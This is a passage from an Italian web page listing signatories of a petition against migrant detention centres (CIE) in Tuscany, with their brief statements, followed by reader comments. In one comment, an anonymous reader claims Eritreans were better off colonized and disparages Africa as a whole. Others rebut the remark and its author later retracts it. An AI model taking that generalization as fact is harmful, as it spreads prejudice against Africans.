–    Ornella De Zordo    perUnaltracittà    perUnaltracittà crede che un centro di identificazione e di espulsione per migranti non possa essere MAI definito un luogo di “accoglienza”. Anche perché è la stessa legge istitutiva a non prevederlo. Tutti sappiamo infatti che parlando di CIE, piccoli o grandi che siano, si parla di luoghi come Ponte Galeria a Roma, come via Corelli a Milano, come Gradisca d’Isonzo. La legge stessa sancisce gli scopi di questi centri, tra i quali non vi è affatto quello dell’accoglienza. E nessuno ci può venire a raccontare che il pacchetto sicurezza del governo Berlusconi può essere sospeso per la Toscana. I CIE funzionano ovunque nello stesso modo, cioè sono luoghi di detenzione di innocenti con il colore della pelle sbagliato. Ed è agghiacciante la concezione che ne è alla base, che trova compimento nel reato di cl andestinità: per la prima volta dal ’38 si punisce una condizione, uno stato, e non un comportamento. Pensare di “mitigare” questa istituzione non è solo vano, è francamente un pericoloso cedimento ideale. Quanto alla retorica del volontariato ricordo che ovunque i CIE sono gestiti non direttamente dal ministero, ma da Misericordia, Croce rossa, cooperative. Con un cospicuo giro di milioni. Credo che questo territorio debba e possa esprimere ben altre posizioni, e dovrebbe anzi preoccuparsi di organizzare forme alternative di accoglienza vera, differenziandosi dalle politiche della destra anziché accodarsi ad essa e poi sostenere a parole di poter “mitigare” quel modello. Ci sarà comunque un’altra Toscana  che farà sentire la propria voce.
–    pagana valentina
–    palma bernardi
–    pamela cuna        Ritengo che ogni uomo debba poter godere fino all’ultimo respiro della libertà come un diritto naturale e non concesso. Questo procedimento di identificazione che si vuole mettere in atto è un atto di negazione della dignità umana.
–    paola camiciottoli
–    Paola Lori
–    paola masi
–    Paola Pugliatti
–    paola rafanelli
–    Paola Vecchiarelli    GAS Vecchiano
–    Paolo Gaddini
–    Paolo Gianardi    Prc
–    Paolo Gozzi
–    Paolo Rafanelli
–    patricia burk        Basta la dipressione dai diritti humani
–    Patrizia Barbanotti    chiesa valdese    Non è degli stranieri che ho paura!
–    patrizia pietrabissa
–    patrizia riva
–    PIERA GIANNINI        NESSUNA GABBIA PER NESSUN ESSERE VIVENTE…………
–    Pierluigi Ontanetti
–    Piero Colacicchi    osservAzione
–    Pietro Baruffetti
–    Pietro Biagini    Comitato contro il sottattraversameno TAV    Come dice Beppe Grillo, l’unica differenza ta Pd e Pdl, sta nella elle. In pratica le loro politiche sono identiche.Che vergogna !
–    Rachele Gonnelli        Abito a Roma ma la mia città è Pisa dove sono stata tra i fondatori di Africa Insieme
–    Raffaele Godoli
–    Raja Ibrahim
–    raniero casini    prc
–    Renata Badii
–    Riccardo Chellini
–    RICCARDO GEPPETTI    AMICI BEPPE GRILLO
–    Riccardo Laterza    Unione degli Studenti
–    riccardo lonetto    italia dei valori, uisp firenze
–    Riccardo Lubrano    GAS Versilia
–    riccardo pieralli    ireos – coordinamento auto-aiuto
–    Rita Svandrlik
–    Roberta Sheldon
–    Roberto Benvenuti    Emergency
–    Roberto Budini Gattai    Perunaltracittà
–    roberto cappellini        GLI ANIMALI HANNO RAGIONE !!
–    Roberto Montanelli
–    Rocco Albanese    sinistra per…    un partito di amministratori che portano avanti politiche di destra, con un presunto bonne tone da uomini “di sinistra”. per quel che valgono, oggi, queste categorie, noi stiamo a sinistra. stiamo dalla parte dell’uguaglianza, dei diritti, della priorità dell’uomo sulle esigenze del capriccioso ingordo dio mercato.
–    rosamaria martellacci
–    Rosario De Zela    ass.contigoperu@libero.it Dobbiamo dire  BASTA!  di questo clima di paura, razzismo e xenofobia … NO NO NO ai Centri di Identificazione ed Espulsione per i migranti, veri e propri lager per stranieri    dobbiamo reagire ora!  o mai piu
–    rosella luchetti    rete lilliput e rete Radiè Resch    manteniamo la tradizione di una Toscana umana e civile: niente Cie/Cpt
–    Rossella Amodeo
–    Sabatino Varriale    Comunità delle Piagge
–    sabina de waal
–    SABRINA CIULLI
–    sabrina gaggini
–    Sabrina Lombardi    WWF Prato SoS Terra
–    Sabrina Rossi    aadafi    fermiamo il candidato, scegliamo sempre, per una buona politica
–    salah ibrahim    Ass. El Mastaba:  «No ai Centri di identificazione ed espulsione per gli stranieri»
–    Salvina Di Gangi     gli anelli mancanti
–    Samuela Marconcini
–    Sandra Rustici
–    sara baldisserri    Gruppo Volontari accoglienza Immigrati
–    sara curci    cooedinamento antifascista senese
–    Sara Palli
–    Sara Prisco    Gas Versilia    mi sento clandestina in questa italia!!!
–    Sauro Niccolai
–    Saverio Musicco        Non vogliamo più maltrattamenti a questi poveri disgraziati. Non è da paese civile!!!
–    Serena Ganzarolli
–    Sergio Bontempelli    Associazione Africa Insieme    Grazie per aver organizzato la petizione!!! L’uscita di Rossi e’ fuori dalla storia della Toscana: storia, anche recente, di presenza associativa, vigile e attenta. Purtroppo vogliono cancellare questa storia e allineare la nostra Regione al clima nazionale. Prima i lavavetri di Cioni, ora questa roba.
–    sergio losacco        Questa regione sta diventando la caricatura della “Toscana felix” !
–    Sergio Tonon    Terra Nuova Edizioni
–    Silvana Scheel        La legge che istituisce i C.I.E è una legge ingiusta. Nessuno può essere privato della libertà, se non dopo essere stato condannato in un regolare processo per un reato commesso. Anche se i C.I.E fossero alberghi a 5 stelle la loro istituzione sarebbe ugualmente sbagliata. Non si può togliere la libertà a qualcuno per quello che è, non per quello che ha fatto. Scusate ma a me vengono in mente le leggi razziali del ’38. Se una legge è ingiusta non la si deve applicare.
–    Silvano Recati    cittadino    No CIE
–    Silvia Gabbrielli
–    SILVIA SPANO’    ASSIEME DI CALENZANO    CHE DIFFERENZA C’E’ TRA UN GOVERNATORE DELL’OPPOSIZIONE E UNO DEL PDL? PUR ESSENDO CONSCIENTE CHE CI VERRANNO IMPOSTI DALL’ALTO, DOBBIAMO RIBADIRE IN MANIERA CHIARA CHE NON VOGLIAMO I CIE, CIOE’ QUESTO TIPO DI ” ACCOGLIENZA” VERSO GLI ALTRI. NON VOGLIAMO NEPPURE CHE GLI ALTRI SIANO TOLLERATI , MA PARI DIGNITA’ PER TUTTI. CIO’ VA DETTO CON MOLTA FERMEZZA. SE POI CE LO IMPONGONO, IL CIE, DEVE ESSERE CHIARO CHE LO SUBIAMO MA NON SIAMO D’ACCORDO. L’ASSOCIAZIONE ASSIEME DI CALENZANO HA COSTRUITO IN MANIERA VOLONTARIA UNA SCUOLA PRIMARIA IN SENEGAL E STIAMO DA ANNI MANTENENDO NON SOLO LA STRUTTURA MA ANCHE A DISTANZA I BAMBINI A  SCUOLA, CON NOSTRI VOLONTARI CHE PERIODICAMENTE VANNO A CONTROLLARE. QUESTA AD ESEMPIO E’ UNA INIZIATIVA . NON MI STUPISCO DELLA TUA AFFERMAZIONE, IMMAGINO CHE SIA IMPRONTATA A BIECO REALISMO, MA COME SPERI DI FARTI VOTARE SE TI CALI LE BRACHE SU QUESTIONI DI PRINCIPIO COME QUESTA? CORTESEMENTE VEDI DI PRECISARE IL TUO PENSIERO E NON MI DELUDERE.SENNO’  CHE DIFFERENZA C’E’ TRA UN GOVERNATORE DELL’OPPOSIZIONE E UNO DEL PDL? UN ABBRACCIO
–    simona giaffreda
–    simone buralli    fiom cgil
–    SIMONE FARINI
–    SImone Fusaro
–    Simone Pisano        E’ vergognoso che Rossi abbia il coraggio di dire di essere di sinistra.
–    Simone Rastelli
–    Sondra Latini    Periferie al Centro
–    Sonia Masi
–    sonia porcu
–    stefania chiodi    GAS Valtiberina
–    Stefania Cordone    FLC CGIL TOSCANA    Firmo la petizione.
–    Stefania Martini
–    stefania Ravasini
–    Stefano Contini
–    Stefano Pettinelli
–    susanna naldini        No! No! No!
–    Tamara Gigli    Partito Umanista
–    Timm Oliver Haag
–    Tiziana Chiappelli
–    Tiziana Landra    Comunità per lo sviluppo umano
–    tiziana seppia
–    tiziano cardosi
–    Tommaso Barsali    LIBERA
–    tommaso tintori
–    Tommaso Visconti
–    toni revelli
–    umberto benedetti
–    Umberto Biccari
–    Valentina Giannotti        NO!!!!!!!!!!!!!!!!!!!!!
–    Valentina Vandilli
–    valeria nardi    coordinamento dei comitati della piana
–    vania bovino    gassolotto
–    victoria d’avanzo
–    VIttorio Gentili

0 Comments

  1. Pingback: NO AI CIE! 500 toscani scrivono a Enrico Rossi. « Notizie FUORI MERCATO – Vicchio

  2. renate

    Ricordiamoci anche dei poveri derelitti ‘eritrei’ sballottati, l’Italia per qualcuno che non vuole sentire ha dei doveri, la prova micidiale,per alcuni della guerra batteriologica, l’uccisione dei poveri inermi…
    Preferisco la coerenza, tra i firmatari esistono persone che nel loro linguaggio comune usano il termine’ negra, extracomunitaria’.
    Si preferisco la coerenza!

    Reply
  3. Loré

    considerato che 98mila cittadini hanno votato leganord in toscana si può, a ragione, suppone che 98mila toscani siano favorevoli ai cie. 500 è davvero una grande conquista? Se i 500 lo credono sono 500 arroganti…E’ un numero piccolo direi invece io, davvero pochi si sono fatti avanti.
    In quanto ai doveri dell’Italia verso gli Eritrei che ho letto in un commeno, ma per piacere…i miei nonni erano antifascisti e contro il colonialismo, il mio peccato di sangue si estingue? allora mi spiace per chi aveva i nonni fascisti…sarà bruttino dirlo, ma stavano meglio colonizzati che ora no? Hanno voluto la bicicletta ma non pedalano, come d’altronde l’intera africa eccetto il nord.

    Reply
    1. red

      Evidentemente una petizione non ha nulla a che fare con un risultato elettorale: i numeri non possono che essere molto minori, considerato che tutti i cittadini sono chiamati al voto, ci sono 3 mesi di campagna elettorale, ecc. Il nostro sito e il nostro giornale sono strumenti forti e seguiti, ma restano piccoli, per cui ci pare in ogni caso un segnale importante se in appena una settimana si raccolgono 500 adesioni. I 500 firmatari inoltre ci sembrano tutt’altro che arroganti, visto che rifiutano l’idea di rinchiudere persone straniere solo perché straniere… a differenza di altri arroganti, come i leghisti, che da anni ci ammorbano col loro razzismo strisciante, ripetendo slogan insensati come “padroni a casa nostra” (cos’è “casa nostra”? la regione o il paese dove per puro caso siamo nati, l’Europa, il pianeta?) e inventandosi ridicole identità padane.

      Reply
  4. maurizio sarcoli

    Noto un comune denominatore tra chi commenta le notizie con questa faciloneria razzista, non si firma mai. Loré chi sei? Un leghista? hai paura? Di chi? Forse di te stesso, della tua storia, ci hai mai pensato? senza memoria tutto si ripete. Firmati, acquista una dignità prendendoti la responsabilità delle tue idee, se sono tue… Ciao, Maurizio Sarcoli (vedi? è facile)

    Reply
  5. Loré

    beh in effetti, quando ci vuole va detto, ho scritto una boiata pazzesca. Mi perdonerete, ero un po’ nervoso l’altro ieri e suppongo volessi far innervosire qualcunaltro. Piccola deroga alla “boiata” però per i debiti che dovremmo avere con le ex colonie, quelli davvero non li concepisco. In quanto al firmarsi, mah, è vero non lo voglio fare ma poi a che servirebbe…curioso questo fatto, lo sottoporro a un analista quando finalmente avrò i soldi per andarci…porgo le mie scuse. Baci

    Reply

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *